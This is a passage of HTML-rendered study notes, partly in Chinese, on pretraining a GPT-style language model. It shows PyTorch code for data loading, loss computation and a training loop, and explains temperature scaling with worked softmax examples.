 <span class="k">print</span><span class="p">(</span><span class="s">"Output:"</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"Output length:"</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">out</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
 <span class="n">decoded_text</span> <span class="o">=</span> <span class="n">tokenizer</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">out</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">tolist</span><span class="p">())</span>
 <span class="k">print</span><span class="p">(</span><span class="n">decoded_text</span><span class="p">)</span>
 <span class="sb">`Hello, I am Featureiman Byeswickattribute argue`</span>
</code></pre></div>    </div>

    <p><img src="阅读图书Build Large Language Model\image%2021.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
</ol>

<h1 id="第5章-pretraining-on-unlabeled-data">第5章 Pretraining on Unlabeled Data</h1>

<p><img src="阅读图书Build Large Language Model\image%2022.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="evaluating-generative-text-models">Evaluating generative text models</h2>

<p><img src="阅读图书Build Large Language Model\image%2023.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2024.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2025.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2026.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2027.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">urllib.request</span>

<span class="n">file_path</span> <span class="o">=</span> <span class="s">"the-verdict.txt"</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"</span>

<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="n">file_path</span><span class="p">):</span>
    <span class="k">with</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="k">as</span> <span class="n">response</span><span class="p">:</span>
        <span class="n">text_data</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">read</span><span class="p">().</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_path</span><span class="p">,</span> <span class="s">"w"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
        <span class="nb">file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">text_data</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_path</span><span class="p">,</span> <span class="s">"r"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
        <span class="n">text_data</span> <span class="o">=</span> <span class="nb">file</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="kn">from</span> <span class="nn">previous_chapters</span> <span class="kn">import</span> <span class="n">create_dataloader_v1</span>

<span class="c1"># Train/validation ratio
</span><span class="n">train_ratio</span> <span class="o">=</span> <span class="mf">0.90</span>
<span class="n">split_idx</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">train_ratio</span> <span class="o">*</span> <span class="nb">len</span><span class="p">(</span><span class="n">text_data</span><span class="p">))</span>
<span class="n">train_data</span> <span class="o">=</span> <span class="n">text_data</span><span class="p">[:</span><span class="n">split_idx</span><span class="p">]</span>
<span class="n">val_data</span> <span class="o">=</span> <span class="n">text_data</span><span class="p">[</span><span class="n">split_idx</span><span class="p">:]</span>

<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>

<span class="n">train_loader</span> <span class="o">=</span> <span class="n">create_dataloader_v1</span><span class="p">(</span>
    <span class="n">train_data</span><span class="p">,</span>
    <span class="n">batch_size</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span>
    <span class="n">max_length</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">stride</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">drop_last</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
    <span class="n">shuffle</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
    <span class="n">num_workers</span><span class="o">=</span><span class="mi">0</span>
<span class="p">)</span>

<span class="n">val_loader</span> <span class="o">=</span> <span class="n">create_dataloader_v1</span><span class="p">(</span>
    <span class="n">val_data</span><span class="p">,</span>
    <span class="n">batch_size</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span>
    <span class="n">max_length</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">stride</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">drop_last</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span>
    <span class="n">shuffle</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span>
    <span class="n">num_workers</span><span class="o">=</span><span class="mi">0</span>
<span class="p">)</span>
<span class="c1"># Sanity check
</span>
<span class="k">if</span> <span class="n">total_tokens</span> <span class="o">*</span> <span class="p">(</span><span class="n">train_ratio</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Not enough tokens for the training loader. "</span>
          <span class="s">"Try to lower the `GPT_CONFIG_124M['context_length']` or "</span>
          <span class="s">"increase the `training_ratio`"</span><span class="p">)</span>

<span class="k">if</span> <span class="n">total_tokens</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">train_ratio</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Not enough tokens for the validation loader. "</span>
          <span class="s">"Try to lower the `GPT_CONFIG_124M['context_length']` or "</span>
          <span class="s">"decrease the `training_ratio`"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">):</span>
    <span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span> <span class="o">=</span> <span class="n">input_batch</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">),</span> <span class="n">target_batch</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_batch</span><span class="p">)</span>
    <span class="n">loss</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">nn</span><span class="p">.</span><span class="n">functional</span><span class="p">.</span><span class="n">cross_entropy</span><span class="p">(</span><span class="n">logits</span><span class="p">.</span><span class="n">flatten</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="n">target_batch</span><span class="p">.</span><span class="n">flatten</span><span class="p">())</span>
    <span class="k">return</span> <span class="n">loss</span>

<span class="k">def</span> <span class="nf">calc_loss_loader</span><span class="p">(</span><span class="n">data_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
    <span class="n">total_loss</span> <span class="o">=</span> <span class="mf">0.</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">return</span> <span class="nb">float</span><span class="p">(</span><span class="s">"nan"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">num_batches</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">num_batches</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="c1"># Reduce the number of batches to match the total number of batches in the data loader
</span>        <span class="c1"># if num_batches exceeds the number of batches in the data loader
</span>        <span class="n">num_batches</span> <span class="o">=</span> <span class="nb">min</span><span class="p">(</span><span class="n">num_batches</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">data_loader</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_batches</span><span class="p">:</span>
            <span class="n">loss</span> <span class="o">=</span> <span class="n">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
            <span class="n">total_loss</span> <span class="o">+=</span> <span class="n">loss</span><span class="p">.</span><span class="n">item</span><span class="p">()</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">break</span>
    <span class="k">return</span> <span class="n">total_loss</span> <span class="o">/</span> <span class="n">num_batches</span>
    
<span class="n">device</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">device</span><span class="p">(</span><span class="s">"cuda"</span> <span class="k">if</span> <span class="n">torch</span><span class="p">.</span><span class="n">cuda</span><span class="p">.</span><span class="n">is_available</span><span class="p">()</span> <span class="k">else</span> <span class="s">"cpu"</span><span class="p">)</span>

<span class="c1"># Note:
# Uncommenting the following lines will allow the code to run on Apple Silicon chips, if applicable,
# which is approximately 2x faster than on an Apple CPU (as measured on an M3 MacBook Air).
# However, the resulting loss values may be slightly different.
</span>
<span class="c1">#if torch.cuda.is_available():
#    device = torch.device("cuda")
#elif torch.backends.mps.is_available():
#    device = torch.device("mps")
#else:
#    device = torch.device("cpu")
#
# print(f"Using {device} device.")
</span>
<span class="n">model</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span> <span class="c1"># no assignment model = model.to(device) necessary for nn.Module classes
</span>
<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span> <span class="c1"># For reproducibility due to the shuffling in the data loader
</span>
<span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span> <span class="c1"># Disable gradient tracking for efficiency because we are not training, yet
</span>    <span class="n">train_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">train_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
    <span class="n">val_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">val_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Training loss:"</span><span class="p">,</span> <span class="n">train_loss</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Validation loss:"</span><span class="p">,</span> <span class="n">val_loss</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="训练模型">训练模型</h2>

<p><img src="阅读图书Build Large Language Model\image%2028.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">train_model_simple</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">optimizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_epochs</span><span class="p">,</span>
                       <span class="n">eval_freq</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">,</span> <span class="n">start_context</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">):</span>
    <span class="c1"># Initialize lists to track losses and tokens seen
</span>    <span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">track_tokens_seen</span> <span class="o">=</span> <span class="p">[],</span> <span class="p">[],</span> <span class="p">[]</span>
    <span class="n">tokens_seen</span><span class="p">,</span> <span class="n">global_step</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span>

    <span class="c1"># Main training loop
</span>    <span class="k">for</span> <span class="n">epoch</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num_epochs</span><span class="p">):</span>
        <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>  <span class="c1"># Set model to training mode
</span>        
        <span class="k">for</span> <span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span> <span class="ow">in</span> <span class="n">train_loader</span><span class="p">:</span>
            <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span> <span class="c1"># Reset loss gradients from previous batch iteration
</span>            <span class="n">loss</span> <span class="o">=</span> <span class="n">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
            <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span> <span class="c1"># Calculate loss gradients
</span>            <span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">()</span> <span class="c1"># Update model weights using loss gradients
</span>            <span class="n">tokens_seen</span> <span class="o">+=</span> <span class="n">input_batch</span><span class="p">.</span><span class="n">numel</span><span class="p">()</span>
            <span class="n">global_step</span> <span class="o">+=</span> <span class="mi">1</span>

            <span class="c1"># Optional evaluation step
</span>            <span class="k">if</span> <span class="n">global_step</span> <span class="o">%</span> <span class="n">eval_freq</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="n">train_loss</span><span class="p">,</span> <span class="n">val_loss</span> <span class="o">=</span> <span class="n">evaluate_model</span><span class="p">(</span>
                    <span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">)</span>
                <span class="n">train_losses</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">train_loss</span><span class="p">)</span>
                <span class="n">val_losses</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">val_loss</span><span class="p">)</span>
                <span class="n">track_tokens_seen</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">tokens_seen</span><span class="p">)</span>
                <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Ep </span><span class="si">{</span><span class="n">epoch</span><span class="o">+</span><span class="mi">1</span><span class="si">}</span><span class="s"> (Step </span><span class="si">{</span><span class="n">global_step</span><span class="si">:</span><span class="mi">06</span><span class="n">d</span><span class="si">}</span><span class="s">): "</span>
                      <span class="sa">f</span><span class="s">"Train loss </span><span class="si">{</span><span class="n">train_loss</span><span class="si">:</span><span class="p">.</span><span class="mi">3</span><span class="n">f</span><span class="si">}</span><span class="s">, Val loss </span><span class="si">{</span><span class="n">val_loss</span><span class="si">:</span><span class="p">.</span><span class="mi">3</span><span class="n">f</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

        <span class="c1"># Print a sample text after each epoch
</span>        <span class="n">generate_and_print_sample</span><span class="p">(</span>
            <span class="n">model</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">start_context</span>
        <span class="p">)</span>

    <span class="k">return</span> <span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">track_tokens_seen</span>

<span class="k">def</span> <span class="nf">evaluate_model</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">):</span>
    <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span>
    <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
        <span class="n">train_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">train_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="n">eval_iter</span><span class="p">)</span>
        <span class="n">val_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">val_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="n">eval_iter</span><span class="p">)</span>
    <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">train_loss</span><span class="p">,</span> <span class="n">val_loss</span>

<span class="k">def</span> <span class="nf">generate_and_print_sample</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">start_context</span><span class="p">):</span>
    <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span>
    <span class="n">context_size</span> <span class="o">=</span> <span class="n">model</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">encoded</span> <span class="o">=</span> <span class="n">text_to_token_ids</span><span class="p">(</span><span class="n">start_context</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
        <span class="n">token_ids</span> <span class="o">=</span> <span class="n">generate_text_simple</span><span class="p">(</span>
            <span class="n">model</span><span class="o">=</span><span class="n">model</span><span class="p">,</span> <span class="n">idx</span><span class="o">=</span><span class="n">encoded</span><span class="p">,</span>
            <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">context_size</span><span class="o">=</span><span class="n">context_size</span>
        <span class="p">)</span>
    <span class="n">decoded_text</span> <span class="o">=</span> <span class="n">token_ids_to_text</span><span class="p">(</span><span class="n">token_ids</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">decoded_text</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="s">" "</span><span class="p">))</span>  <span class="c1"># Compact print format
</span>    <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>

<span class="c1"># Note:
# Uncomment the following code to calculate the execution time
# import time
# start_time = time.time()
</span>
<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>
<span class="n">model</span> <span class="o">=</span> <span class="n">GPTModel</span><span class="p">(</span><span class="n">GPT_CONFIG_124M</span><span class="p">)</span>
<span class="n">model</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
<span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">AdamW</span><span class="p">(</span><span class="n">model</span><span class="p">.</span><span class="n">parameters</span><span class="p">(),</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.0004</span><span class="p">,</span> <span class="n">weight_decay</span><span class="o">=</span><span class="mf">0.1</span><span class="p">)</span>

<span class="n">num_epochs</span> <span class="o">=</span> <span class="mi">10</span>
<span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">tokens_seen</span> <span class="o">=</span> <span class="n">train_model_simple</span><span class="p">(</span>
    <span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">optimizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span>
    <span class="n">num_epochs</span><span class="o">=</span><span class="n">num_epochs</span><span class="p">,</span> <span class="n">eval_freq</span><span class="o">=</span><span class="mi">5</span><span class="p">,</span> <span class="n">eval_iter</span><span class="o">=</span><span class="mi">5</span><span class="p">,</span>
    <span class="n">start_context</span><span class="o">=</span><span class="s">"Every effort moves you"</span><span class="p">,</span> <span class="n">tokenizer</span><span class="o">=</span><span class="n">tokenizer</span>
<span class="p">)</span>

<span class="c1"># Note:
# Uncomment the following code to show the execution time
# end_time = time.time()
# execution_time_minutes = (end_time - start_time) / 60
# print(f"Training completed in {execution_time_minutes:.2f} minutes.")
</span></code></pre></div></div>

<p><img src="阅读图书Build Large Language Model\image%2029.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="temperature-scaling"><strong>Temperature Scaling</strong></h2>

<p><strong>Temperature Scaling（温度缩放）</strong> 是一种用于校准深度学习模型（尤其是分类模型）输出概率的技术。它通常用于提高模型预测概率的可靠性，使其更接近真实概率分布。温度缩放是 <strong>模型校准（Model Calibration）</strong> 的一种简单而有效的方法。</p>

<h3 id="1-背景模型校准问题">1. <strong>背景：模型校准问题</strong></h3>

<p>在分类任务中，深度学习模型通常会输出每个类别的概率（通过 softmax 函数）。然而，这些概率并不总是准确的，尤其是当模型过于自信或不够自信时：</p>

<ul>
  <li><strong>过度自信</strong>：模型输出的概率值过高（例如，预测某个类别的概率为 0.99，但实际上并不准确）。</li>
  <li><strong>不够自信</strong>：模型输出的概率值过低（例如，预测某个类别的概率为 0.6，但实际上应该更高）。</li>
</ul>

<p>模型校准的目标是调整模型的输出概率，使其更接近真实概率分布。</p>

<hr />

<h3 id="2-温度缩放的原理">2. <strong>温度缩放的原理</strong></h3>

<p>温度缩放通过在 softmax 函数中引入一个 <strong>温度参数 ( T )</strong> 来调整模型的输出概率。具体来说，softmax 函数的公式被修改为：</p>

<p>[
\text{softmax}(z_i) = \frac{e^{z_i / T}}{\sum_{j=1}^N e^{z_j / T}}
]</p>

<p>其中：</p>

<ul>
  <li>( z_i ) 是模型对第 ( i ) 个类别的 logit（未归一化的预测值）。</li>
  <li>( T ) 是温度参数。</li>
  <li>( N ) 是类别的总数。</li>
</ul>

<h3 id="温度参数--t--的作用">温度参数 ( T ) 的作用：</h3>

<ul>
  <li><strong>( T = 1 )</strong>：这是标准的 softmax 函数，不进行任何调整。</li>
  <li><strong>( T &gt; 1 )</strong>：增大温度会使得输出概率分布更加平滑，降低模型的置信度（概率值更接近均匀分布）。</li>
  <li><strong>( T &lt; 1 )</strong>：减小温度会使得输出概率分布更加尖锐，增加模型的置信度（概率值更接近 0 或 1）。</li>
</ul>

<hr />

<h3 id="3-温度缩放的实现">3. <strong>温度缩放的实现</strong></h3>

<p>温度缩放的实现非常简单，通常包括以下步骤：</p>

<ol>
  <li>在验证集上训练一个温度参数 ( T )。</li>
  <li>将训练好的 ( T ) 应用于测试集或实际推理中，调整模型的输出概率。</li>
</ol>

<h3 id="代码示例">代码示例：</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn.functional</span> <span class="k">as</span> <span class="n">F</span>

<span class="c1"># 假设模型的 logits 输出
</span><span class="n">logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">2.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">]])</span>

<span class="c1"># 标准 softmax（T=1）
</span><span class="n">probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Standard softmax:"</span><span class="p">,</span> <span class="n">probs</span><span class="p">)</span>  <span class="c1"># 输出: tensor([[0.6590, 0.2424, 0.0986]])
</span>
<span class="c1"># 温度缩放（T=2）
</span><span class="n">T</span> <span class="o">=</span> <span class="mi">2</span>
<span class="n">scaled_probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Temperature scaled (T=2):"</span><span class="p">,</span> <span class="n">scaled_probs</span><span class="p">)</span>  <span class="c1"># 输出: tensor([[0.5423, 0.3380, 0.1197]])
</span>
<span class="c1"># 温度缩放（T=0.5）
</span><span class="n">T</span> <span class="o">=</span> <span class="mf">0.5</span>
<span class="n">scaled_probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Temperature scaled (T=0.5):"</span><span class="p">,</span> <span class="n">scaled_probs</span><span class="p">)</span>  <span class="c1"># 输出: tensor([[0.7489, 0.2100, 0.0411]])
</span>
</code></pre></div></div>

<h3 id="输出结果">输出结果：</h3>

<ul>
  <li>当 ( T = 2 ) 时，概率分布更加平滑，模型的置信度降低。</li>
  <li>当 ( T = 0.5 ) 时，概率分布更加尖锐，模型的置信度增加。</li>
</ul>

<hr />

<h3 id="4-如何选择温度参数--t-">4. <strong>如何选择温度参数 ( T )</strong></h3>

<p>温度参数 ( T ) 通常通过在验证集上优化来获得。具体步骤如下：</p>

<ol>
  <li>在验证集上计算模型的 logits 和真实标签。</li>
  <li>使用优化方法（如梯度下降）最小化负对数似然损失（Negative Log-Likelihood, NLL），找到最佳的 ( T )。</li>
</ol>

<h3 id="代码示例-1">代码示例：</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 假设验证集的 logits 和标签
</span><span class="n">val_logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">2.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">],</span> <span class="p">[</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">]])</span>
<span class="n">val_labels</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">])</span>  <span class="c1"># 真实标签
</span>
<span class="c1"># 定义温度参数 T（初始值为 1.0）
</span><span class="n">T</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="n">requires_grad</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>

<span class="c1"># 优化器
</span><span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">LBFGS</span><span class="p">([</span><span class="n">T</span><span class="p">],</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.01</span><span class="p">)</span>

<span class="c1"># 优化过程
</span><span class="k">def</span> <span class="nf">eval</span><span class="p">():</span>
    <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span>
    <span class="n">loss</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">cross_entropy</span><span class="p">(</span><span class="n">val_logits</span> <span class="o">/</span> <span class="n">T</span><span class="p">,</span> <span class="n">val_labels</span><span class="p">)</span>
    <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">loss</span>

<span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">(</span><span class="nb">eval</span><span class="p">)</span>

